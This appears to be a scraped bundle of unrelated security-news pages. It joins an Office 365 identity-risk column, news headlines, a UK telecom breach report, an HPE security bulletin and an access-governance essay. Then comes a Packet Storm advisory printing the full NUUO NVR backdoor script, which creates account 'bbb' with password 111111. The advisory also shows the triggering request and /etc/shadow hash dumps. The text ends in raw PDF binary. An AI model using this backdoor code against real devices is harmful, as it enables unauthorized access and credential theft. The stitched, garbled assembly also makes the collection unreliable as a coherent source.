Access

Are Too Many Companies Putting Identity and Access at Unnecessary Risk in Their Move to the Cloud?

I was chatting with the CSO of a Fortune 500 company a couple of weeks ago and the topic came around to cloud services. Her company is famously cloud-averse.

“I know you guys don’t do cloud,” I began, “but are you moving to Office 365?”

“Probably. Eventually. I think we’re going to get dragged there whether we want to go or not,” she replied.

Identity Access Risks in CloudMicrosoft Office has long been the most popular business productivity software suite. Now the Redmond-based giant is aggressively promoting their cloud-based version, Office 365, to organizations of all sizes. The promise of Office 365 is better collaboration (do we really need to email 12Mb Word docs around all the time?), which should increase user productivity. In theory, creative employees can use it to collaborate anytime, anywhere, from any device.

For small businesses particularly, the lure of a few dollars each month for the cloud version instead of hundreds of dollars per employee for the desktop suite is a huge temptation and given the choice, they’ll just go with it. I would, skinflint that I am.

But larger organizations, such as the one run by the CSO I was chatting with, want to be more proactive about their cloud security. And she’s right to think that way; most Office 365 deployments result in user credentials (including C-level usernames and passwords) going to the cloud whether they mean to or not.

Don’t believe me? Let’s look at the three identity and access management models used by Office 365.

Cloud Identity Model – All your passwords belong to Microsoft.

The simplest Office365 identity model is the Cloud Identity Model, where user names and passwords are managed solely in the cloud with Office 365 creating a user identity. The user identity is stored in and verified by Azure Active Directory.

Synchronized Identity Model – Passwords hashed on-premises and in the cloud.

In the Synchronized Identity Model, an organization’s on-premises server manages user identity, while the user account and password hashes are synchronized to Azure AD. Users enter the same password on premises as they would in the cloud, with their password hashes verified by Azure Active Directory.

Federated Identity Model—The most secure, but still sees mobile user passwords.

The Federated Identity Model is the most secure method to access Office 365. It is similar to the Synchronized Identity Model but uses an on-premises identity provider to verify the user password hash. That means the password hash does not need to be synchronized to Azure Active Directory.

The Federated Identity model suffers from a mobile client password gap. Nearly all mobile email clients use the ActiveSync protocol. ActiveSync doesn’t support federation and transmits the user password to Azure AD. Azure AD sends the password back to the on-premises identity manager for verification over an encrypted tunnel, but is that good enough?

What’s the Threat Model Here, Anyway?

Here’s a short list of possible threat vectors you’d consider if you were doing a threat model assessment for any of cloud passwords management models (including the three above):

· Cloud breach

· Man-in-the-middle attack

· Rogue cloud employee

· Nation-state (subpoena)

· Accidental credential logging

· Phishing attack

Where possible, Microsoft has clearly done what it can to avoid seeing user passwords, but they still do. And there are plenty of examples of all of the above threats being realized. Whether or not these threat vectors fall into your assessment model is up to your organization.

Closing the Gap

Many organizations have decided that they are comfortable with this gap. No model is 100 percent secure, right? But a few CSOs want to close the gap before they make the switch. Right now, the way to do it is to intercept and proxy ActiveSync connections from the client to an on-premises proxy which then encrypts the passwords before they transit to Azure AD.

The final step is to implement adaptive multi-factor authentication (MFA). Adaptive MFA is risk-based authentication and can include certificate checks and context-aware, one-time passwords (OTP) via email.

Most organizations say they support MFA but when you drill down, they’re only providing it to select users (C-levels, hopefully, and IT, and a few others). MFA that covers only some users isn’t ideal, but it’s better than no MFA at all.

Cloud Should Be More Than Someone Else’s Computer

Getting back to the conversation with that CSO. Even though her organization is famously cloud-adverse, she knows they’re going to end up editing Word documents and PowerPoint files in the cloud. When they do, there will be no turning back. Her staff’s real challenge will be managing the risk before – and when - that happens.

view counter

David Holmes is an evangelist for F5 Networks' security solutions, with an emphasis on distributed denial of service attacks, cryptography and firewall technology. He has spoken at conferences such as RSA, InfoSec and Gartner Data Center. Holmes has authored white papers on security topics from the modern DDoS threat spectrum to new paradigms of firewall management. Since joining F5 in 2001, Holmes has helped design system and core security features of F5's Traffic Management Operating System (TMOS). Prior to joining F5, Holmes served as Vice President of Engineering at Dvorak Development. With more than 20 years of experience in security and product engineering, Holmes has contributed to security-related open source software projects such as OpenSSL. Follow David Holmes on twitter @Dholmesf5.

Previous Columns by David Holmes:

Tags:


SecurityWeek RSS Feed

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Cryptsetup Vulnerability Grants Root Shell Access on Some Linux Systems

November 15, 2016 , 3:28 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Regulation May Be Best Answer to IoT Insecurity

November 16, 2016 , 1:10 pm

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Computer hackers have broken into a database of Three Mobile customers and accessed their personal details in order to steal smartphones, the UK network said on Thursday.

A spokesman for the company said there had been an uptick in attempted phone fraud over the past four weeks, both through burglaries of Three retail stores and intercepting customer phone upgrades.

"In order to commit this type of upgrade handset fraud, the perpetrators used authorised logins to Three's upgrade system.

"This upgrade system does not include any customer payment, card information or bank account information," the spokesman said.

Three Mobile Cyber Attack and Data BreachPersonal details including names and addresses were accessed and are believed to have been used by fraudsters to order the phone upgrades, which were sent to eight customers and intercepted.

A probe is currently underway to determine how many more of the company's nine million customers have had their data breached, while the eight known clients have been contacted by Three.

A source close to the matter was quoted by The Telegraph as saying the private information of two thirds of Three customers could be at risk.

"The investigation is ongoing and we have taken a number of steps to further strengthen our controls," said the company spokesman.

Three people were arrested on Wednesday in connection to the fraud and have since been bailed.

A 48-year-old man from Kent, south-east England, and a 39-year-old man from Manchester, north-west England, were arrested on suspicions of computer misuse offences.

A 35-year-old man also from Manchester was arrested on suspicion of attempting to pervert the course of justice.

Related: TalkTalk Handed Record Fine for Data Breach

Related: Information Commissioner Talks Privacy Laws in Post-Brexit UK

view counter

© AFP 2016

Tags:


SecurityWeek RSS Feed

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c052577
11

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c013454
99

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com. [email concealed]

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com [email concealed]

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJXyJX9AAoJEGIGBBYqRO9/M/wH/26FtoAFFJZ2vb9Y3nF3rIzu
lS0Vd+kOf45OVntpJ3e5MLISEBWMxdibNTG49iXsqS0H/BsEV9j09oAHHjCpwylk
OwPB0v0xVzCuI3mUgQ8ANBj4oIkYzRv0vfwbAwpMrrAA2goLxijhxxUR9sE4Zrz3
93FwNW2H/IUq7ma5LCUDzudNgDfXR6iTH7zKJKLYDz/mPBwD/IJGtv8Si6O5oZ03
hUOqNl6irkP+415K358PU927CcQcFkLY+Wv3OsitG+w1AILRE5IV4aqIPVJCPwUl
U9vTn5jyVkHz0FHr45eK6V+ts2xaGbKYcW4fYIzfAoYUO/YBULiZ8Zwlr/TNM+g=
=Dh4J
-----END PGP SIGNATURE-----

[ reply ]


SecurityFocus Vulnerabilities

access governanceWe must continue to hold the line, and we are, in this war on information security. We must continue to find our stride and take steps forward in regard to technology advancement especially as related to identity and access governance solutions.

Even as organizations continue to make great efforts and achieve success to gain control over security and access to their data, there’s no end in sight for the numerous to hacks and breach that will continue to strike most organizations. Unfortunately, the high-profile hacks and breaches of customer information will continue. Yet, we seldom hear any detail about internal access breaches (breaches because of internal organizational issues), until recently that is.

Let’s take a look at some recent research by the Ponemon Institute, which said that nearly 90 percent of all healthcare organizations have been breached over the past two years, and about half of those estimate they’ve been breach more than five times over that same period. While criminal attacks appear to be the primary reason for breaches in healthcare, “internal problems such as mistakes — unintentional employee actions, third-party snafus and stolen computing devices — account for the other half of data breaches.”

When an employee inadvertently has access to sensitive information and uses it for nefarious purposes, these internal breaches may not be detrimental in the near term, but could pose significant risk should the employee decide to leave or have an axe to grind with the organization.

Large, multi-national organizations often have the luxury of spending six to seven figure sums, can assign internal teams and hire consultants for six to 18 months to ensure that processes like role-based access control (RBAC), attestation and reconciliation were running smoothly and accurately. However, small to mid-size organizations have traditionally the cost and time to outweigh the benefits and have done the best they could to secure the internal network and data access with limited resources.

This is changing, especially for the smaller firms. The solutions are finally available for all organizations, and when implemented, provide added protection to the security of an organization’s data.

As we’ll continue to see, solution providers will see forward movement and provide great security strides while offering simpler, low-cost solutions in identity governance and administration. These solutions mean organizations that were previously excluded from considering these products will now be able to implement these solutions without the needs of hiring consultants or spending their entire IT budget for the year on them.

As with so many other technologies, what started out as only accessible to a few, will now be driven down market to become a reality for many. The real winner in this scenario are these small to mid-size companies — who need access to these solutions just as much as their bigger counterparts — that will now be able to implement best-of-class solutions to secure data, application and network access without the burden of world-class prices.

Moving ahead, we will likely continue to see great promise in security, data protection and access management despite the rise in breach and hack. In addition to new technology solutions, training and awareness training can help reduce the internal breach problems organizations of all sizes obviously face.

Tremendous promise continues on its way. If nothing else, we’ll continue to finally see more security and greater access to information for organizations in so far as reducing unauthorized access to data and applications and securing the same on a “need to know” basis since they’ll likely continue implementing identity and access governance solutions.


Help Net Security

i>>?
NUUO Backdoor (strong_user.php) Remote Shell Access

Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that when called, a backdoor user is created with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb' when created
with the password '111111' by visiting 'strong_user.php' script is able to initiate a
secure shell session and further steal and/or destroy sensitive information.

==================================================================
/strong_user.php:
-------------------------------

<?php

class ReadPasswd{
private $ file;
private $ fileData;
private $ error;

function __construct($ file)
try{
if (is_file($ file))
{
$ this->fileData = file($ file);
$ this->file = $ file;

else

throw new Exception("Couldnat open file.");

} catch (Exception $ e)
$ this->error[] = $ e->getMessage();

}

public function getAllHTML()
foreach ($ this->fileData as $ content)
{
$ temp = explode(':', $ content);
$ output .= "<b>Username: {$ temp[0] </b><br />";
$ output .= "Validation: $ temp[1] <br />";
$ output .= "User Identifier: $ temp[2] <br />";
$ output .= "Group Identifier: $ temp[3] <br />";
$ output .= "Gecos Field: $ temp[4] <br />";
$ output .= "Home Directory: $ temp[5] <br />";
$ output .= "Shell: $ temp[6] <br />";
$ output .= "<br />";
}
return $ output;
}

public function getAllCLI()
foreach ($ this->fileData as $ content)
{
$ temp = explode(':', $ content);
$ output .= "Username: {$ temp[0] n";
$ output .= "Validation: $ temp[1] n";
$ output .= "User Identifier: $ temp[2] n";
$ output .= "Group Identifier: $ temp[3] n";
$ output .= "Gecos Field: $ temp[4] n";
$ output .= "Home Directory: $ temp[5] n";
$ output .= "Shell: $ temp[6] n";
$ output .= "n";
}
return $ output;
}

public function searchUser($ user,$ data=0)
try{
$ data = array();
if (is_string($ user))
{
foreach($ this->fileData as $ line)
{
$ temp = explode(':', $ line);
if (in_array($ user,$ temp))
{
if ($ data) return 1;
$ data['username'] = $ temp[0];
$ data['validation'] = $ temp[1];
$ data['user_identifier'] = $ temp[2];
$ data['group_identifier'] = $ temp[3];
$ data['gecos'] = $ temp[4];
$ data['home_directory'] = $ temp[5];
$ data['shell'] = $ temp[6];

}
}
else

throw new Exception('A search error has occured.');

} catch (Exception $ e)
$ this->error[] = $ e->getMessage();

return $ data;
}

public function getError()
return $ this->error;

public function deleteUser($ user)
try{
if ($ this->searchUser($ user,1))
{
foreach ($ this->fileData as $ line)
{
$ lines = explode(":",$ line);
if (!in_array($ user,$ lines))
{
$ final .= $ line;

}
if(!file_put_contents($ this->file,$ final))

throw new Exception("Could not delete user.");

}
else

throw new Exception("User doesnat exist.");

} catch (Exception $ e)
echo $ this->error[] = $ e->getMessage();

}
}

/*

echo "Strong test ";

ma_getuser();
ma_getgroup();

$ result = array('users' => array(), 'groups' => array());

echo "<br>";
echo $ maUser;
echo "<br>";
echo $ maGroup;
echo "<br>";

foreach($ maGroup as $ key =>$ value)

$ tmp = array();
$ tmp['groupname'] = $ maGroup[$ key]->strGroupname;
$ tmp['members'] = array();
echo "Group (" . $ key . ") === " . $ maGroup[$ key]->strGroupname;
echo "<br><br>";
ma_getgroupmember($ maGroup[$ key]->strGroupname);
foreach ($ maGroupmember as $ mKey => $ mValue)
{
echo " User ($ mKey) ===> $ mValue ";
echo "<br>";
array_push($ tmp['members'], $ maGroupmember[$ mKey]->strUsername);

//foreach($ value as $ userkey => $ uservalue)
//
// echo " User ($ userkey) ===> $ uservalue ";
// echo "<br>";
//
echo "<br>";
echo implode(",", $ tmp['members']);
echo "<br>";
$ tmp['membersStr'] = implode(",", $ tmp['members']);
array_push($ result['groups'], $ tmp);
}

echo "<h1> Other </h1>";
$ tmp = array();
$ tmp['groupname'] = 'admin';
ma_getgroupmember($ tmp['groupname']);
//ma_getgroupmember('');
$ tmp['members'] = array();
foreach ($ maGroupmember as $ mKey => $ mValue)

array_push($ tmp['members'], $ maGroupmember[$ mKey]->strUsername);
echo $ maGroupmember[$ mKey]->strUsername . "<br>";

$ tmp['membersStr'] = implode(",", $ tmp['members']);
array_push($ result['groups'], $ tmp);

echo "<h1> USER </h1>";

foreach ( $ maUser as $ key => $ value)

$ tmp = array();
$ tmp['username'] = $ maUser[$ key]->strUsername;
$ tmp['groups'] = array();
foreach ($ result['groups'] as $ gKey => $ gValue)
{
if (in_array($ tmp['username'], $ gValue['members']))
array_push($ tmp['groups'], $ gValue['groupname']);

$ tmp['groupsStr'] = implode(",", $ tmp['groups']);
echo $ tmp['username'] . "<br>";
echo $ tmp['groupsStr'] . "<br>";
array_push($ result['users'], $ tmp);
}
*/

echo "<h1> Read Passwd </h1>";

$ passclass = new ReadPasswd('/etc/passwd');
echo $ passclass->getAllHTML();

echo "<h1> add user </h1>";
//$ output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
//$ output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
$ output = system("adduser bbb -G poweruser -D ");

/*

$ f = popen ("/usr/bin/passwd bbb","r");
$ read = fread($ f, 1024);
$ out = fwrite($ f,"111111\n");
echo $ read . " read 111 ,,, $ out <br>";
$ read = fread($ f, 1024);
$ out = fwrite($ f,"111111\n");
echo $ read . " read 222 ,,, $ out <br>";
pclose($ f);
//echo $ output . " kkk <br>";
*/
$ descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w") // stdout is a pipe that the child will write to
);

$ process = proc_open('/usr/bin/passwd bbb', $ descriptorspec, $ pipes);
if (is_resource($ process))
{
$ read = fread($ pipes[1], 1024);
$ out = fwrite($ pipes[0],"111111\n");
echo $ read . " read 111 ,,, $ out <br>";
$ read = fread($ pipes[1], 1024);
$ out = fwrite($ pipes[0],"111111\n");
echo $ read . " read 111 ,,, $ out <br>";

fclose($ pipes[0]);
fclose($ pipes[1]);
}
proc_close($ process);

//$ handle = popen("/bin/ls", "r");
//$ read = fread($ handle, 1024);
//echo $ read;
//pclose($ handle);

?>

==================================================================

Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php

14.01.2016

--

#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------

[email protected]:~# cat /etc/shadow
#root:$ 1$ 1b0pmacH$ sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$ 1$ vd3TecoS$ VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::

#2
Issuing GET request to the script:
-----------------------------------

GET http://10.0.0.17/strong_user.php HTTP/1.1

#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------

[email protected]:~# cat /etc/shadow
#root:$ 1$ 1b0pmacH$ sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$ 1$ vd3TecoS$ VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$ 1$ gYfUNAQN$ .sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::

#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------

login as: bbb
[email protected]'s password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$ 1$ 1b0pmacH$ sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$ 1$ vd3TecoS$ VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$ 1$ gYfUNAQN$ .sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$


Exploit Files ≈ Packet Storm

%PDF-1.6 %äãÏÒ 1 0 obj [/PDF/ImageB/ImageC/ImageI/Text] endobj 4 0 obj <</Length 5 0 R /Filter/FlateDecode >> stream xœ endstream endobj 5 0 obj 8 endobj 6 0 obj <</Subtype/Image /Width 150 /Height 150 /BitsPerComponent 8 /ColorSpace/DeviceRGB /Filter/FlateDecode /Length 7 0 R >> stream xœígx]ŵ÷!!›póá^¾¼onè á’¼¸@hƒ &6„zÁÀIè6ظɲ-˲%Y]Vï½Z½ËjVï½Ë²lÉr’ûþgÖÞsf—st$ ‰÷³=Gçì}ÊþíµÖÍ̞ùßÿ=¿ßÎoç·óÛùíüv~;¿ßÎosޞjk﬩­/.-ËÍ/ŒOLŽKHŽOŠ‰KŒŽM€EÅÄGFÇEDņGÆÀÂ"¢³sóaûË*êšpøää‘sý;þ…¶écÇúúªkëò ŠSÓ3SÒ2RR÷%§¦'¥¤'&§%$ ¥Æ'¦Ø14<*$ ,’,($ †7))-ëìꞜœ<׿òŸm;yêÔÀà`]}#\,3+7#3g_FvzFVÚ¾,Sˆx”’Ãㄤ”ø4ŽJƒÃ‚BaØ­¨¤´£³ëÌ™3çúׇ·S§N WVUçææä îeåäefç ˆY9YÙyx>'¯ûäååçåãùþ2tÎ:…œ@ASÑ? æ·7(;'ï<Ê9m_~ùåÁƒãÈP…%ŒHAˆˆpâ’â’²Òýå°XiYqÉþ¢âÒ¢Råû ê<~Ë<484BÑ×?–•Û××®OÏ·z;}útOoyE•ŽHAa10••WÂ+*À°þ…YXˆ"‡Â7‘4]÷†È}üÂ#£Tל>ï’Ú ì !tD`eåUªkkjêªkêð ê@Í7 QÄXDW¢·ïހÀ|¹cÇfÎõ™;÷ÛéÓgÚ;:C&@5µu MP/0T ç"R. ½|üaˆêǎ;×gñÜlÐ=½} "pà/56575·66µ€à· "B+4R¤[email protected]Õ\ŠçúŒ~£ÛÈÈh}}#p"õ -­íÜÚš[Zç€âyáŸèéåóðòñðdæã»72:6" ¥DtjzÆÙ@¤b)[email protected]ôôöójmm;×çõ›ØŽÍ̀b$ pÔp …@ kkïhmë°bfVNDd´¯_Àf‡­«×¬]õ—÷ædŸ­]¿~ÃfW7$ 50š+DªAWD/ß„Ääééés}Ž¿® eÂððáA–è›;;»;»z cPsÙ1'7?4,b‡³Ë~2Wd¶íãO>Å•àíãrÞ~ˆpFè$ Gq§OEeÕ¹>Ù¿Í?ÞÖÖÑÐØL8ðà»z»º{f…˜_Päãë¿æÓu6¼òÖÊ'þôâ²Wž¾ý™mö­úÏvûò«¯úú…CØ ã¯mˆyù.»\§§Ôpædkñ•,¹ò‚¯ºàÁ«/xèê–’]sÁÃ’á_z;`7ìŒCp aå@q1€&|Ùø¹[·CÙΈˆJÝ=¼‹JJq ŸkóÜNž< 4¡ÀhxddxdthxÄÄä”´›¶Áýæ©E?yðj„ì!"uí¿¿ö‚e?g¶üç.ÿÅ…»Ž›úïò_`eO‚qøC*P•&>׉åºÏ7BºÌ 184冀ˆˆzêÔésMcn®:hN!‡‚ µ±°¨dÓf ;d+8ÅO–¨à«ÔàS„Œ`=z³?üòÂÇ`×3{ÜŠÑ«Ø ;ÓQ€é/T *M|G g_üâãFŽÁa¶!Rù/ b¤’sÅÞ ø¦¦¦ETăѱƒÇ·±¾¡i»ÓN,¹þñ».yà*Åãdp‚Ú~©Àzâ¿™=yÃ…OÁ~uáa¿fö´dô^ÂØ ;ÓQ„•€M%÷J| ¸¤Nü8lÙp¶!"¢ ˆÐ9€ø폨ø†GQ±·¯ÿÐÄaØø¡ Sˆ cdÇÒ9ÅIœêhDíIÎtžý¿Ÿåö܍°ïÁž7‰í‰Cžápñ&TÐ|ä: Jî’—

